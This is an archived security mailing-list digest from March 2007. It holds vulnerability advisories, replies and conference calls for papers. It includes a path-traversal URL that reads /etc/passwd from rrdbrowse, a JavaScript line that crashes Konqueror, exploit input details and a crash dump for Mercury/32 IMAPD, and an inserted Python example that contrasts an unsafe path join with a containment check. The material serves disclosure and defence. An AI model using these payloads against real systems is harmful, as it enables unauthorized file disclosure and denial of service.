"Mu Security" discovered that a format string vulnerability in the VoIP solution GnomeMeeting allows the execution of arbitrary code.

For the stable distribution (sarge) this problem has been fixed in version 1.2.1-1sarge1.

For the upcoming stable distribution (etch) this problem has been fixed in version 2.0.3-2.1 of the ekiga package.
For the unstable distribution (sid) this problem has been fixed in version 2.0.3-2.1 of the ekiga package.

We recommend that you upgrade your gnomemeeting package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From 3APA3A at security.nnov.ru Sun Mar 4 18:45:14 2007
From: 3APA3A at security.nnov.ru (3APA3A)
Date: Sun, 4 Mar 2007 21:45:14 +0300
Subject: [Full-disclosure] MOPB-08-2007 - dejavu of dejavu
Message-ID: <1323880093.20070304214514@security.nnov.ru>

Hello mopb,

phpinfo() cross-site scripting

http://www.php-security.org/MOPB/MOPB-08-2007.html

was initially(?) reported in 2003 by Silent Needle

http://securityvulns.com/docs4647.html

--
/3APA3A
http://securityvulns.com/

From Valdis.Kletnieks at vt.edu Sun Mar 4 19:01:51 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 04 Mar 2007 14:01:51 -0500
Subject: [Full-disclosure] PostScript security research
In-Reply-To: Your message of "Sat, 03 Mar 2007 20:06:46 +0100." <45E9C746.50804@observed.de>
References: <45E9C746.50804@observed.de>
Message-ID: <200703041901.l24J1p1K012209@turing-police.cc.vt.edu>

(First attempt to post fell afoul of an RBL)

On Sat, 03 Mar 2007 20:06:46 +0100, Paul Sebastian Ziegler said:
> 1) Has anybody researched this before (no need to crash open doors)
> 2) Is PostScript capable of using the system()-call or something similar?

Hardly news. Quoting RFC1341, section 7.4.2, issued in June 1992, as part of the original specification of MIME:

7.4.2 The Application/PostScript subtype

A Content-Type of "application/postscript" indicates a PostScript program. The language is defined in [POSTSCRIPT].
It is recommended that Postscript as sent through email should use Postscript document structuring conventions if at all possible, and correctly.

The execution of general-purpose PostScript interpreters entails serious security risks, and implementors are discouraged from simply sending PostScript email bodies to "off-the-shelf" interpreters. While it is usually safe to send PostScript to a printer, where the potential for harm is greatly constrained, implementors should consider all of the following before they add interactive display of PostScript bodies to their mail readers.

The remainder of this section outlines some, though probably not all, of the possible problems with sending PostScript through the mail.

Dangerous operations in the PostScript language include, but may not be limited to, the PostScript operators deletefile, renamefile, filenameforall, and file. File is only dangerous when applied to something other than standard input or output. Implementations may also define additional nonstandard file operators; these may also pose a threat to security. Filenameforall, the wildcard file search operator, may appear at first glance to be harmless. Note, however, that this operator has the potential to reveal information about what files the recipient has access to, and this information may itself be sensitive. Message senders should avoid the use of potentially dangerous file operators, since these operators are quite likely to be unavailable in secure PostScript implementations. Message-receiving and -displaying software should either completely disable all potentially dangerous file operators or take special care not to delegate any special authority to their operation. These operators should be viewed as being done by an outside agency when interpreting PostScript documents.
Such disabling and/or checking should be done completely outside of the reach of the PostScript language itself; care should be taken to insure that no method exists for reenabling full-function versions of these operators.

The PostScript language provides facilities for exiting the normal interpreter, or server, loop. Changes made in this "outer" environment are customarily retained across documents, and may in some cases be retained semipermanently in nonvolatile memory. The operators associated with exiting the interpreter loop have the potential to interfere with subsequent document processing. As such, their unrestrained use constitutes a threat of service denial. PostScript operators that exit the interpreter loop include, but may not be limited to, the exitserver and startjob operators. Message-sending software should not generate PostScript that depends on exiting the interpreter loop to operate. The ability to exit will probably be unavailable in secure PostScript implementations. Message-receiving and -displaying software should, if possible, disable the ability to make retained changes to the PostScript environment. Eliminate the startjob and exitserver commands. If these commands cannot be eliminated, at least set the password associated with them to a hard-to-guess value.

PostScript provides operators for setting system-wide and device-specific parameters. These parameter settings may be retained across jobs and may potentially pose a threat to the correct operation of the interpreter. The PostScript operators that set system and device parameters include, but may not be limited to, the setsystemparams and setdevparams operators. Message-sending software should not generate PostScript that depends on the setting of system or device parameters to operate correctly. The ability to set these parameters will probably be unavailable in secure PostScript implementations.
Message-receiving and -displaying software should, if possible, disable the ability to change system and device parameters. If these operators cannot be disabled, at least set the password associated with them to a hard-to-guess value.

Some PostScript implementations provide nonstandard facilities for the direct loading and execution of machine code. Such facilities are quite obviously open to substantial abuse. Message-sending software should not make use of such features. Besides being totally hardware-specific, they are also likely to be unavailable in secure implementations of PostScript. Message-receiving and -displaying software should not allow such operators to be used if they exist.

PostScript is an extensible language, and many, if not most, implementations of it provide a number of their own extensions. This document does not deal with such extensions explicitly since they constitute an unknown factor. Message-sending software should not make use of nonstandard extensions; they are likely to be missing from some implementations. Message-receiving and -displaying software should make sure that any nonstandard PostScript operators are secure and don't present any kind of threat.

It is possible to write PostScript that consumes huge amounts of various system resources. It is also possible to write PostScript programs that loop infinitely. Both types of programs have the potential to cause damage if sent to unsuspecting recipients. Message-sending software should avoid the construction and dissemination of such programs, which is antisocial. Message-receiving and -displaying software should provide appropriate mechanisms to abort processing of a document after a reasonable amount of time has elapsed. In addition, PostScript interpreters should be limited to the consumption of only a reasonable amount of any given system resource.
Finally, bugs may exist in some PostScript interpreters which could possibly be exploited to gain unauthorized access to a recipient's system. Apart from noting this possibility, there is no specific action to take to prevent this, apart from the timely correction of such bugs if any are found.

From sesser at hardened-php.net Sun Mar 4 19:18:46 2007
From: sesser at hardened-php.net (Stefan Esser)
Date: Sun, 04 Mar 2007 20:18:46 +0100
Subject: [Full-disclosure] MOPB-08-2007 - dejavu of dejavu
In-Reply-To: <1323880093.20070304214514@security.nnov.ru>
References: <1323880093.20070304214514@security.nnov.ru>
Message-ID: <45EB1B96.8080708@hardened-php.net>

hello

3APA3A wrote:
> Hello mopb,
>
> phpinfo() cross-site scripting
>
> http://www.php-security.org/MOPB/MOPB-08-2007.html
>
> was initially(?) reported in 2003 by Silent Needle
>
> http://securityvulns.com/docs4647.html
>

Well technically it is a different XSS vulnerability. The one by silent needle obviously affected string variable output. The XSS in MOPB affects only array variable output.

Stefan Esser

From sebastian at wolfgarten.com Sun Mar 4 19:35:34 2007
From: sebastian at wolfgarten.com (Sebastian Wolfgarten)
Date: Sun, 04 Mar 2007 20:35:34 +0100
Subject: [Full-disclosure] Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6
Message-ID: <45EB1F86.7050403@wolfgarten.com>

I - TITLE

Security advisory: Arbitrary file disclosure vulnerability in rrdbrowse

II - SUMMARY

Description: Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org
Date: March 4th, 2007
Severity: Medium
References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt

III - OVERVIEW

Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and webinterface for RRDTool. It has a threaded daemon which periodically runs from cron. It works with small .nfo files which hold router information and optionally connection details, colors, min max, bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism to store interface names. It's much MRTG like in it's current state". More information about the product can be found online at http://www.rrdbrowse.org.

IV - DETAILS

Due to improper input validation, the CGI application "rrdbrowse" (versions <= 1.6) is vulnerable to an arbitrary file disclosure vulnerability. It allows an unauthenticated remote attacker to read any file on the remote system if the user the webserver is running as has permissions to do so. Thus an attacker is able to gain access to potentially sensitive information.
V - EXPLOIT CODE

The vulnerability is trivial to exploit and only requires specifying a URL with a relative file path on the remote system such as

http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd

As the input to the "file" parameter is not validated in any way, accessing this URL will expose the contents of /etc/passwd to a remote attacker (interestingly except the first line).

VI - WORKAROUND/FIX

To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has released an updated CVS version (1.7) of the software which is available at http://www.rrdbrowse.org. Hence all users of rrdbrowse are asked to test and install this version as soon as possible.

VII - DISCLOSURE TIMELINE

06. February 2007 - Notified vendor
14. February 2007 - Patch/new version released
04. March 2007 - Public disclosure

From tyoptyop at gmail.com Sun Mar 4 20:08:11 2007
From: tyoptyop at gmail.com (Tyop?)
Date: Sun, 4 Mar 2007 21:08:11 +0100
Subject: [Full-disclosure] month of PHP bugs, secondary message?
Message-ID: <985b1a3d0703041208h3a4cbf4ah1cd443286fb48f33@mail.gmail.com>

On 3/4/07, Gadi Evron wrote:
> -----
> 3. Are PHP applications also a target of this initiative?
>
> No they are not. If you want a month of PHP application bugs you can
> subscribe to the bugtraq or full-disclosure mailinglists.
>
> -----
>
> http://www.php-security.org/

And he didn't speak about false/insignificant holes disclosure.
I gave my solution some months ago. Use mail filters "file inclusion", "sql injection"... -> forward spam.

Troll detected... (^-^)

-- 
Tyop?
Student.
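A containment check for the "file" parameter described in the rrdbrowse advisory above, added here as an example; it is not rrdbrowse's own code (which the advisory does not show), and the pages directory is a placeholder. The flawed pattern (joining the parameter straight onto a base directory) is kept beside the hardened resolver so the difference on the advisory's own input is visible.

```python
import posixpath
import urllib.parse

# Directory rb.cgi is assumed to serve page files from.  Placeholder for the
# example; the advisory does not give rrdbrowse's real layout.
PAGES_DIR = "/var/www/rrdbrowse/pages"


def unchecked_join(file_param, base_dir=PAGES_DIR):
    """Where an unvalidated 'file' parameter ends up (the flawed pattern).

    Joining untrusted input straight onto the base directory lets '..'
    segments walk out of it; normpath shows the path open() would get.
    """
    return posixpath.normpath(posixpath.join(base_dir, file_param))


def resolve_page_file(file_param, base_dir=PAGES_DIR):
    """Map the untrusted 'file' parameter to a path under base_dir, or None.

    Layered checks: reject empty, NUL-containing and absolute input,
    normalise '.' and '..' segments, then require the result to lie
    strictly below base_dir.  The prefix test includes a trailing '/',
    so a sibling directory such as '<base_dir>2' does not pass.  A
    deployed handler should also realpath() the result to account for
    symlinks inside the pages directory.
    """
    if not file_param or "\0" in file_param:
        return None
    candidate = file_param.replace("\\", "/")  # treat backslash as a separator too
    if candidate.startswith("/"):
        return None
    base = posixpath.normpath(base_dir)
    resolved = posixpath.normpath(posixpath.join(base, candidate))
    if not resolved.startswith(base + "/"):
        return None
    return resolved


def handle_page_request(query_string, base_dir=PAGES_DIR):
    """Resolve the 'file' of a mode=page request the way a hardened handler could.

    parse_qs percent-decodes, so encoded traversal (%2e%2e%2f) is checked
    in its decoded form.  Returns the path to serve, or None to refuse.
    """
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    if params.get("mode", [""])[0] != "page":
        return None
    return resolve_page_file(params.get("file", [""])[0], base_dir)


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/passwd"   # the advisory's input
    print("unchecked:", unchecked_join(traversal))
    print("checked:  ", resolve_page_file(traversal))
    print("normal:   ", handle_page_request("mode=page&file=router1.nfo"))
```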
From mark at bindshell.net Sun Mar 4 21:37:16 2007
From: mark at bindshell.net (mark)
Date: Sun, 04 Mar 2007 21:37:16 +0000
Subject: [Full-disclosure] Extending JavaScript Portscanning to Include Banner Grabbing
Message-ID: <45EB3C0C.6030400@bindshell.net>

There's a new paper/advisory at: http://bindshell.net/papers/ftppasv

Here's a quick summary:

A common implementation flaw in FTP clients allows FTP servers to cause clients to connect to other hosts. This seemingly small vulnerability has some interesting consequences for web browser security (namely in Firefox, Opera and Konqueror).

This paper discusses the FTP client flaw in detail and demonstrates how it can be used to attack web browsers. Proof of concept code is presented that extends existing JavaScript port-scanning techniques to scan any TCP port from Firefox (even though it now implements "port banning" restrictions). Because of the way the same-origin policy is applied it is also possible to perform banner-grabbing scans against arbitrary hosts. Finally, for services that don't return a banner an alternative fingerprinting technique is demonstrated which measures the time it takes servers to close inactive TCP connections.

From mark at bindshell.net Sun Mar 4 21:38:01 2007
From: mark at bindshell.net (mark)
Date: Sun, 04 Mar 2007 21:38:01 +0000
Subject: [Full-disclosure] Konqueror DoS Via JavaScript Read Of FTP Iframe
Message-ID: <45EB3C39.1090504@bindshell.net>

Summary

Konqueror crashes if JavaScript code tries to read the source of a child iframe which is set to an ftp:// URL.

Impact

It is possible for malicious websites to crash Konqueror and possibly other applications which rely on KJS.

Details

The KDE JavaScript implementation, KJS, has been found to crash when it tries to read the contents of an FTP iframe. This can be demonstrated by creating a web page with an iframe with a src of "ftp://localhost/anything", then reading the contents of this iframe with JavaScript similar to the following. (A working FTP server is not required.)

    var contents = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;

Exploit

Proof of concept code is available at: http://bindshell.net/advisories/konq355

Vulnerable Versions

This vulnerability has been tested on Gentoo and Debian running KDE 3.5.5.

Reported By

mark at bindshell.net
http://bindshell.net/advisories/konq355

Disclosure Timeline

2007-02-03 Vulnerability reported to security at kde.org
2007-02-28 KDE team recreate bug and produce preliminary patch for nodes.cpp
2007-03-01 KDE team produced updated patch for ecma/kjs_html.cpp
2007-03-04 Public advisory released

Patch Information

The latest patch received from the KDE team is available from: http://bindshell.net/advisories/konq355/konq355-patch.diff

From prabu at hackinthebox.org Mon Mar 5 11:44:10 2007
From: prabu at hackinthebox.org (Praburaajan)
Date: Mon, 05 Mar 2007 19:44:10 +0800
Subject: [Full-disclosure] HITBSecConf2007 - Malaysia: Call for Papers now Open
Message-ID: <45EC028A.6040407@hackinthebox.org>

The CFP for HITBSecConf2007 - Malaysia is now open.

HITBSecConf - Malaysia is the premier network security event for the region and the largest gathering of hackers in Asia. Our 2007 event is expected to attract over 700 attendees from around the world and will see 4 keynote speakers in addition to 40 deep-knowledge technical researchers presenting over two days.

Being a deep-knowledge technical conference, talks that are more technical or that discuss new and never before seen attack methods are of more interest than a subject that has been covered several times before.

Summaries not exceeding 250 words should be submitted (in plain text format) to cfp at hackinthebox.org for review and possible inclusion in the programme. Submissions are due no later than 1st May 2007.
Topics of interest include, but are not limited to the following:

# 3G/4G Cellular Networks
# SS7/Backbone telephony networks
# Analysis of network and security vulnerabilities
# Firewall technologies
# Intrusion detection
# Data Recovery and Incident Response
# GPRS and CDMA Security
# Identification and Entity Authentication
# Network Protocol and Analysis
# Smart Card Security
# Virus and Worms
# WLAN and Bluetooth Security
# Analysis of malicious code
# Applications of cryptographic techniques
# Analysis of attacks against networks and machines
# File system security
# Security in heterogeneous and large-scale environments

PLEASE NOTE: We do not accept product or vendor related pitches. If your talk involves an advertisement for a new product or service your company is offering, please do not submit.

Your submission should include:

# Name, title, address, email and phone/contact number
# Draft of the proposed presentation (in PDF or PowerPoint format), proof of concept for tools and exploits, etc.
# Short biography, qualification, occupation, achievement and affiliations (limit 150 words).
# Summary or abstract for your presentation (limit 250 words)
# Time (45-60 minutes including time for discussion and questions)
# Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 3 nights. For each non-resident speaker, HITB will cover travel expenses (through our airline partners, Malaysia Airlines) up to USD 1,000.00.

HITBSecConf2007 - Malaysia: The Largest Network Security Event in Asia!
http://conference.hitb.org/hitbsecconf2007kl/

From shyaam at gmail.com Mon Mar 5 14:08:26 2007
From: shyaam at gmail.com (Shyaam)
Date: Mon, 5 Mar 2007 09:08:26 -0500
Subject: [Full-disclosure] Hakin9 Magazine - Request for Article

Hi All,

To keep this email short: the next issue of Hakin9 study kit is on "Exploits, rootkits, exploit writing, buffer overflow, and so on". The issue after that is on "Intrusion Defense".

Website: www.hakin9.org/en

Please do shoot me an email at shyaamevilfingers com. I work as an Editor and my duty this time is to collect papers for these issues and enumerate the content based on the goodness factor which is determined by the Hakin9 scale.

Thank you for your patience and great to have your contribution.

Kind Regards,
Shyaam

From stfr at scip.ch Mon Mar 5 13:06:03 2007
From: stfr at scip.ch (Stefan Friedli)
Date: Mon, 05 Mar 2007 14:06:03 +0100
Subject: [Full-disclosure] ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities
Message-ID: <45EC15BB.6050305@scip.ch>

ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities

scip AG Vulnerability ID 2893 (12/22/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893

I. INTRODUCTION

ePortfolio is an e-banking application by TKS Banking Solutions. More information is available on the vendor's web site at the following URL: http://www.tksbankingsolutions.com/

II. DESCRIPTION

Stefan Friedli found several web-based vulnerabilities that were identified in ePortfolio version 1.0 Java and may affect earlier versions as well. The application uses heavy amounts of javascript code for operation. While this is not generally a bad thing, it causes massive problems when it comes to data validation. As we recognized, the entire validation of input is realized by client-side javascript, which can easily be bypassed using a proxy such as BURPproxy or WebScarab to modify original requests sent (and validated) by the browser. We assume this vulnerability to exist in nearly every form offered by the application. Due to the limited functionality of the account used for testing, we're not able to definitely confirm or deny this fact.
PoC Code is not being published.

IV. IMPACT

As there is a serious lack of server-side measures to protect the application from malicious input, an attacker may realize nearly every attack that relies on lacking input validation, which includes Cross Site Scripting and Cross-Site Request Forgery (Session Riding).

V. DETECTION

Detection of web based attacks requires a specialized web proxy and/or intrusion detection system. Patterns for detection of basic attacks are available and easy to implement, though they may possibly fail on more sophisticated attacks.

VI. SOLUTION

Server-side input validation should be provided by the application vendor as soon as possible.

VII. VENDOR RESPONSE

The problems were recognized and will, according to the vendor, be addressed with the next release by the end of this week. Further, the vendor claims to be able to change the faulty behaviour remotely or by editing a non-specified file for existing customers.

VIII. SOURCES

scip AG - Security Consulting Information Process (german)
http://www.scip.ch
scip AG Vulnerability Database (german)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893

IX. DISCLOSURE TIMELINE

12/22/06 Identification of the vulnerabilities
02/05/07 Notification of the vendor
03/02/07 Vendor Response
03/02/07 Release of public advisory

IX. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

Stefan Friedli, scip AG, Zuerich, Switzerland
stfr-at-scip.ch
http://www.scip.ch

A2. LEGAL NOTICES

Copyright (c) 2007 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory.

From skodliv at gmail.com Mon Mar 5 13:31:16 2007
From: skodliv at gmail.com (poo)
Date: Mon, 5 Mar 2007 14:31:16 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>

I CARE

On 3/4/07, Lolek of TK53 wrote:
>
> Hi,
> On 3/2/07, sbauer at gjl-network.net wrote:
> > Author: Sebastian Bauer
> > Web: http://blog.gjl-network.net
> > Date: 01/12/07
> >
> > Vuln. website: http://www.knorr.de
> > Vulnerability: SQL Injection (mainly login authentication bypass + any
> > other SQL inj.
> > possibility), XSS
> > Significance: Very Critical
>
> OMFG who cares.....
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
smile tomorrow will be worse

From labs-no-reply at idefense.com Mon Mar 5 22:18:01 2007
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Mon, 05 Mar 2007 17:18:01 -0500
Subject: [Full-disclosure] iDefense Security Advisory 03.05.07: Apple QuickTime Color Table ID Heap Corruption Vulnerability
Message-ID: <45EC9719.10206@idefense.com>

Apple QuickTime Color Table ID Heap Corruption Vulnerability

iDefense Security Advisory 03.05.07
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 05, 2007

I. BACKGROUND

Quicktime is Apple's media player product used to render video and other media. For more information visit http://www.apple.com/quicktime/

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Apple Computer Inc.'s QuickTime media player could allow an attacker to execute arbitrary commands in the context of the current user.

The vulnerability specifically exists in QuickTime player's handling of Video media atoms. When the 'Color table ID' field in the Video Sample Description is 0, QuickTime expects a color table to be present immediately after the description. A byte swap process is then performed on the memory following the description, regardless of whether a table is present or not. Heap corruption will occur in the case when the memory following the description is not part of the heap chunk being processed.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context of the current user. In order to exploit this vulnerability, an attacker must persuade a victim into opening a specially crafted media file. This could be accomplished by either a direct link or referenced from a website under the attacker's control. No further interaction is required in the default configuration.

IV. DETECTION

iDefense Labs confirmed this vulnerability exists in version 7.1.3 of QuickTime on Windows. Previous versions are suspected to be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workarounds for this vulnerability.

VI. VENDOR RESPONSE

Apple has addressed this vulnerability by releasing version 7.1.5 of Quicktime. More information can be found in Apple Advisory APPLE-SA-2007-03-05 at the following URL.

http://docs.info.apple.com/article.html?artnum=305149

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0718 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

12/06/2006 Initial vendor notification
12/11/2007 Initial vendor response
02/01/2007 Second vendor notification
03/05/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Ruben Santamarta of Reversemode Labs (www.reversemode.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright (c) 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From wesley at mcgrewsecurity.com Mon Mar 5 18:10:14 2007
From: wesley at mcgrewsecurity.com (Robert Wesley McGrew)
Date: Mon, 5 Mar 2007 12:10:14 -0600
Subject: [Full-disclosure] Extending JavaScript Portscanning to Include Banner Grabbing
In-Reply-To: <45EB3C0C.6030400@bindshell.net>
References: <45EB3C0C.6030400@bindshell.net>

On 3/4/07, mark wrote:
> There's a new paper/advisory at: http://bindshell.net/papers/ftppasv
>
> Here's a quick summary:
>
> A common implementation flaw in FTP clients allows FTP servers
> to cause clients to connect to other hosts. This seemly small
> vulnerability has some interesting consequences for web browser security
> (namely in Firefox, Opera and Konqueror).
>
> This paper discusses the FTP client flaw in detail and demonstrates how
> it can be used to attack web browsers. Proof of concept code is
> presented that extends existing JavaScript port-scanning techniques to
> scan any TCP port from Firefox (even though it now implements
> "port banning" restrictions). Because of the way the same-origin policy
> is applied it is also possible to perform banner-grabbing scans against
> arbitrary hosts. Finally, for services that don't return a banner an
> alternative fingerprinting technique is demonstrated which measures
> the time it takes servers to close inactive TCP connections.

I love how clever the recent exploits of Firefox have been. They're really fun to play with.

I took a look at this technique this morning, compared to the older style of HTTP connections for JavaScript scanning, and I think that a very important note is that this PASV technique allows for one to use web browsers to scan for you, without it being immediately obvious to the target what you're up to (since there's no request headers being pushed to the open ports). While it is indeed quite slow, I think it serves as a much cleaner way to scan, from the perspective of how quiet it is with its interaction with the target. I guess it's a trade-off if you want to poke at the ports a little more by sending some data.

I've posted some pcap dumps illustrating the difference, in case anyone wants to see without having to go through all the set-up: http://www.mcgrewsecurity.com/blog/?p=8

So, awesome work! It's a shame your notification to security@ for mozilla got filtered as spam :)

-- 
Robert Wesley McGrew
http://mcgrewsecurity.com

From bania.piotr at gmail.com Tue Mar 6 04:08:30 2007
From: bania.piotr at gmail.com (Piotr Bania)
Date: Tue, 06 Mar 2007 05:08:30 +0100
Subject: [Full-disclosure] Apple QuickTime Player Remote Heap Overflow
Message-ID: <45ECE93E.50303@gmail.com>

Apple QuickTime Player Remote Heap Overflow
by Piotr Bania
http://www.piotrbania.com
All rights reserved.

Severity: Critical - potential remote code execution.

Software affected: Tested on QuickTime 7.1 (Windows version), with all newest add-ons.

Timeline:
03/09/2006 Vulnerability sent to the vendor.
03/09/2006 Initial vendor response.
06/03/2007 Security bulletin released.

Full advisory at: http://www.piotrbania.com/all/adv/quicktime-heap-adv-7.1.txt

best regards,
pb

-- 
--------------------------------------------------------------------
Piotr Bania - - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com - Key ID: 0xBE43AC33
--------------------------------------------------------------------
- "The more I learn about men, the more I love dogs."

From smaillist at gmail.com Tue Mar 6 08:57:08 2007
From: smaillist at gmail.com (Sowhat)
Date: Tue, 6 Mar 2007 00:57:08 -0800
Subject: [Full-disclosure] Apple QuickTime udta ATOM Integer Overflow

Apple QuickTime udta ATOM Integer Overflow

By Sowhat of Nevis Labs
Date: 2007.03.06

http://www.nevisnetworks.com
http://secway.org/advisory/AD20070306.txt
http://secway.org/advisory/AD20060512.txt

CVE: CVE-2007-0714

Vendor: Apple Inc.

Affected Versions: Apple QuickTime versions < 7.1.5

Overview:

We have discovered a critical vulnerability in Quicktime Player. The vulnerability allows an attacker to execute arbitrary code in the context of the user who executes QuickTime.
This vulnerability can be exploited by persuading a user to open a carefully crafted .mov file or visit a website embedding the malicious .mov file.

The CVE-2006-1460 does not patch the root cause of this vulnerability.

Details:

This vulnerability exists in the way Quicktime processes the "udta" Atom of the .mov files.

The layout of a udta (user data atom) atom:

                             Bytes
 _______________________
| User data atom        |
|   Atom size           |   4
|   Type = 'udta'       |   4
|                       |
|   User data list      |
|     Atom size         |   4
|     Type = user data types|   4
|                       |
 -----------------------

By setting the value of the Atom size to a large value such as 0xFFFFFFFF, an insufficiently-sized heap block will be allocated, resulting in a classic complete heap memory overwrite during the RtlAllocateHeap() function.

Vendor Response:

2006.05.06 Vendor notified via product-security at apple.com
2006.05.07 Vendor responded
2006.05.09 Vendor ask for more information
2006.05.11 Vendor released QuickTime 7.1, the code path was influenced, but the root cause was not fixed.
2007.03.06 Vendor released the fixed version
2007.03.06 Advisory release

Reference:
1. http://developer.apple.com/documentation/QuickTime/QTFF/index.html
2. http://docs.info.apple.com/article.html?artnum=305149
3. http://secway.org/advisory/AD20060512.txt

-- 
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"

From mu-b at digit-labs.org Tue Mar 6 15:41:25 2007
From: mu-b at digit-labs.org (mu-b)
Date: Tue, 06 Mar 2007 15:41:25 +0000
Subject: [Full-disclosure] Mercury/32 4.01b
Message-ID: <45ED8BA5.6020605@digit-labs.org>

Attached is a remote exploit (disarmed PoC) for Mercury/32 4.01b IMAPD. The vulnerability is located in the call:-

034646AE call sub_346ECD9

which is passed (as third argument) the number of bytes remaining in a stack buffer in order to construct the complete command from the continuation data. However the calculation neglects to take into account the length of the previously supplied command ("1 LOGIN <900 x '\x20'> {255}"). The result of the attached exploit is a DoS (given below); however, remote code execution is possible in at least two different ways without authentication...

(b24.a70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0456d70c ebx=41414141 ecx=7ffad000 edx=034a2970 esi=00000500 edi=00000000
eip=00441d88 esp=0456d6dc ebp=0456d6ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mercuryi!miconfig_proc_3+0xbacd:
0346ed48 8807            mov     byte ptr [edi],al          ds:0023:04570000=??

(note this may be the same as BID 21110).

-- 
mu-b (mu-b at digit-labs.org)

"Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct."
- Anonymous, "P ?= NP"

-------------- next part --------------
A non-text attachment was scrubbed...
Name: mercurypown-v1.pl
Type: text/x-perl
Size: 2072 bytes
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/11368a55/attachment.bin

From fukami at berlin.ccc.de Tue Mar 6 15:57:13 2007
From: fukami at berlin.ccc.de (fukami)
Date: Tue, 6 Mar 2007 16:57:13 +0100
Subject: [Full-disclosure] Call for Participation Chaos Communication Camp 2007

Chaos Communication Camp 2007
The International Hacker Open Air Gathering

"In Fairy Dust We Trust!"

August, 8th to 12th, 2007
Airport Museum Finowfurt (Finow Airport)
near Berlin, Germany

http://events.ccc.de/camp/2007/

=== Overview ===

We ask you to participate in the third Chaos Communication Camp on August, 8th to 12th, 2007 near Berlin, Germany. The Chaos Communication Camp is organized by the Chaos Computer Club (CCC). It is an international, five-day open-air event for hackers and associated life-forms.
The Camp features two conference tracks with interesting lectures. Workshops will take place in a central workshop area and in thematic "villages", organized by various groups. You can participate! Bring your tent and join the villages. The Camp has everything you need: power, internet, food, music, sun and fun. The large area features enough space to camp.

The Camp is intended to promote the exchange of technical, social and political ideas and concepts to find ways to make this world a little bit more friendly for intelligent beings, be they carbon-based or otherwise.

The conference languages are English and German.

=== Topics ===

In general, lectures and workshops dealing with technology, ethics, science, security, art, philosophy, politics, culture and cooking are welcome. The main theme of this year's camp is the world we want to live in tomorrow. We try, however, to create a certain focus on a number of topics that we regard as important for the near future. We want:

* flying and non-flying autonomous robots
* security, encryption and anonymity
* software projects
* technologies for the day after the climate change
* rapid prototyping and fabbing
* software and hardware for disaster-resistant infrastructure
* bringing broadband to the countryside
* politics and propaganda
* anti-crowd-control tactics and technologies
* lock picking
* alternative energy systems
* citizen surveillance, data mining technologies, and social networks
* data forensic methods
* all things radio (preferably digital)
* self-sustaining and -reproducing hardware
* pollution free transport systems
* hacker anthropology and sociology of the scene
* flying cars, saucers and carpets
* 42
* tesla generators
* telecommunication technologies
* FPGA based analysis
* military technologies
* all kinds of voting computers
* ebooks
* satellites and rockets

(and countermeasures against all of the above).

